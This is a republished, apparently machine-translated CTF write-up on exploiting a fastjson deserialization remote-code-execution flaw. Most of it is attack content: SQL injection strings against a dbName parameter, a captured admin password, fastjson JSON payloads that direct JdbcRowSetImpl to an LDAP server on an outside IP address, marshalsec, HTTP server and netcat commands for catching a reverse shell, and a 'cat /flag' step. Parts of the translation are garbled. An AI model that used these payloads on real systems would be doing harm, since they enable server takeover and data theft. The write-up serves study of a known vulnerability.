Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an analysis of how to deserialize fastjson vulnerabilities. The article is rich in content and analyzed and described from a professional point of view. I hope you can get something after reading this article.

0x01: write in front

After getting the title, the code is found through the audit code at first.

Audit found an injection, dbname we can control

Try to inject

DbName=myapp#' and 1'2 union select name from myapp.user;#dbName=myapp#' and 1'2 union select pwd from myapp.user;#

The account password of the inputting place is kept as a backup (after the idea is changed to exp, it is found that the above account password is useless)

Admin

Admin@Rrrr_ctf_asde

And then reverse noticed the import.

Io.swagger.annotations.ApiOperation

Turns out it's a swagger.

Swagger is an excellent document editor used in daily work.

Then access swagger-ui.html directly

Think of swagger and fastjson libraries that can convert java objects into json.

There have been many rce vulnerabilities in the past 19 years. Try to view

Search fastjson on the Internet and find out that there is a rce vulnerability.

This article is really written in great detail, which can be said to be hand-to-hand teaching.

Https://github.com/CaijiOrz/fastjson-1.2.47-RCE

See the following

This fits well with the json format of fastjson's deserialization vulnerability.

According to the interview, I learned as follows

Step by step, first prepare the CVM and upload the warehouse files to the CVM.

After a successful upload, do the following

Test it first.

CVM listens to port 7777

Execute at the shooting range

{"name": {"@ type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "x": {"@ type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://121.36.19.222:7777/Exploit", "autoCommit": true}

Traffic echo is found

Then continue to follow the document.

Cd went in to check.

Change the ip of exploit.java to ip of CVM

Get Exploit.class after Javac Exploit.java compilation and execution

Proceed. Follow these steps to continue.

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer

Http://121.36.19.222/#Exploit

The successful execution is shown below to listen on local port 1389

Python-m SimpleHTTPServer 80

Nc listens on local port 8888

Submit payload

{"name": {"@ type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "x": {"@ type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://121.36.19.222:1389/Exploit", "autoCommit": true}

Successful after execution

Successfully bounced to shell

Execute cat / flag to get the following flag

0x02: summary

In daily practice, like burp to take the fastjson detection script, and send a packet to check if it is suspicious. Show that there is a loophole, try payload to hit dnslog to try echo, and then dig further.

The above is the analysis of how to deserialize fastjson vulnerabilities shared by the editor. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.